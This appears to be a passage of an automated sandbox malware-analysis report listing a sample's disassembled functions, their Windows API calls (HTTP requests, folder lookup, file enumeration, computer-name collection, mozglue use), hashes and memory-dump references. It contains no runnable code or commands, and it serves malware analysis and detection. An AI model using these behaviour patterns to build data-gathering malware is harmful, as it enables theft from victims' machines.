Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: aaaad893e9565f5d8cf48dd087d08ced2aedd797c9ed9eaac2d1238a5ae2b995
Instruction ID: 1973ea1889adf4a3b2d587c21ab983f77304832c53d06fb73c50aa05336d8a5a
Opcode Fuzzy Hash: aaaad893e9565f5d8cf48dd087d08ced2aedd797c9ed9eaac2d1238a5ae2b995
Instruction Fuzzy Hash: 69F05E72984319ABEB02ABE0EC07BBE7B38EB04741F10851BF523A53C1DBB05540D656

Function 003C47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

Strings

<, xrefs: 003C47C9

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 98de111f5e278e59965a40ed6f296c5e5cd29fee997ab0248f8a6fcda29f51a4
Instruction ID: ce3622bc86554959b08f8c4f82259451834b3f6bb8b5bff09db0667f16a05300
Opcode Fuzzy Hash: 98de111f5e278e59965a40ed6f296c5e5cd29fee997ab0248f8a6fcda29f51a4
Instruction Fuzzy Hash: A6214FB1D00209ABDF14DFA4E945BDE7B75FB45320F108626F915AB2C1EB706A05CF91

Function 003D51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C6280: InternetOpenA.WININET(003E0DFE,00000001,00000000,00000000,00000000), ref: 003C62E1
Part of subcall function 003C6280: StrCmpCA.SHLWAPI(?,00E6F518), ref: 003C6303
Part of subcall function 003C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C6335
Part of subcall function 003C6280: HttpOpenRequestA.WININET(00000000,GET,?,00E6F000,00000000,00000000,00400100,00000000), ref: 003C6385
Part of subcall function 003C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003C63BF
Part of subcall function 003C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003C63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D5228

Strings

ERROR, xrefs: 003D5273
ERROR, xrefs: 003D521A

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 8989aca64e4269622bcf78041d85d803de3f7e3f68de4a41bd3cab598ce86763
Instruction ID: 4fe482da4ce15236ef5c9599caa44dc6acedd05605364ae338439baada0155fa
Opcode Fuzzy Hash: 8989aca64e4269622bcf78041d85d803de3f7e3f68de4a41bd3cab598ce86763
Instruction Fuzzy Hash: 7E113332900548A7CB16FFB0EE52EED7738AF50300F404559F80A4E692EF70AB15D791

Function 003D4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D4F7A
lstrcat.KERNEL32(?,003E1070), ref: 003D4F97
lstrcat.KERNEL32(?,00E69EC8), ref: 003D4FAB
lstrcat.KERNEL32(?,003E1074), ref: 003D4FBD

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D492C
Part of subcall function 003D4910: FindFirstFileA.KERNEL32(?,?), ref: 003D4943

Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FDC), ref: 003D4971
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FE0), ref: 003D4987
Part of subcall function 003D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003D4B7D
Part of subcall function 003D4910: FindClose.KERNEL32(000000FF), ref: 003D4B92

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: a25a3a27e15305c5570df46d6c0a3af90f179a99a330e8b3f0f2c0feb29df396
Instruction ID: c7242fb62f9e9fd22e44a526e2a3e2e95686f3453b78fe237294101295d52b4f
Opcode Fuzzy Hash: a25a3a27e15305c5570df46d6c0a3af90f179a99a330e8b3f0f2c0feb29df396
Instruction Fuzzy Hash: 4E21DA7794030867C755FBB0EC46EEE333DAB54340F004559B68997181EE74EBC98B92

Function 003D0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00E69EA8), ref: 003D079A
StrCmpCA.SHLWAPI(00000000,00E69FA8), ref: 003D0866
StrCmpCA.SHLWAPI(00000000,00E69EB8), ref: 003D099D

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 2ed8e56b425f245a5214c1d338a4a45858a14462a315eae101e8b4047accbc1e
Instruction ID: c2f8f0abb1e0edb14aee41a9e220c3379b5278bc867f1d20f0ef20975c534d3d
Opcode Fuzzy Hash: 2ed8e56b425f245a5214c1d338a4a45858a14462a315eae101e8b4047accbc1e
Instruction Fuzzy Hash: C7916876A102489FCB29EF64DA95FED77B5FF95300F408519E80A9F341DB309A05CB92

Function 003D0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00E69EA8), ref: 003D079A
StrCmpCA.SHLWAPI(00000000,00E69FA8), ref: 003D0866
StrCmpCA.SHLWAPI(00000000,00E69EB8), ref: 003D099D

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7186e2453f27848d50e6d0bd276676bbe995007dcf1fb52c20ab480d67ed9de8
Instruction ID: 6a1711047d26f24a8f68ff63a5a6d45217a6c9d58c242bef0a995159fa45b265
Opcode Fuzzy Hash: 7186e2453f27848d50e6d0bd276676bbe995007dcf1fb52c20ab480d67ed9de8
Instruction Fuzzy Hash: 69815675B102489FCB19EF64DA91BEDB7B6FF94300F508519E8099F351DB30AA06CB82

Function 003D5050 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D508A
lstrcat.KERNEL32(?,00E6EFE8), ref: 003D50A8

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D492C
Part of subcall function 003D4910: FindFirstFileA.KERNEL32(?,?), ref: 003D4943

Strings

, xrefs: 003D509B

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-2740779761
Opcode ID: ea2ce155a7571504372821201740ffebec5edf575848e106537ebe399aeff3b2
Instruction ID: 835e76df35dd14cd973b35fb92eaba2933ca06d1aeaf8b2d8e6f86207633d06f
Opcode Fuzzy Hash: ea2ce155a7571504372821201740ffebec5edf575848e106537ebe399aeff3b2
Instruction Fuzzy Hash: 50019B7794030857C755FBB0EC42EEE733DAB54340F004599B6899A191EE70AAC98B92

Function 003D78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7910
RtlAllocateHeap.NTDLL(00000000), ref: 003D7917
GetComputerNameA.KERNEL32(?,00000104), ref: 003D792F

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: dfea970686c444da560885f897de9a116c705f75afab841ca377306f5e32961b
Instruction ID: 8222383b9eb8cfb38c2501cb2d12f85ca0e47511c3e6703622ab72ceab7ca51c
Opcode Fuzzy Hash: dfea970686c444da560885f897de9a116c705f75afab841ca377306f5e32961b
Instruction Fuzzy Hash: 7F016DB2A44308EBC710DF99DD45BAFBBB8FB04B61F10422AEA45A2780D37459008BA1

Function 6C583060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C583095

Part of subcall function 6C5835A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C60F688,00001000), ref: 6C5835D5
Part of subcall function 6C5835A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5835E0
Part of subcall function 6C5835A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5835FD
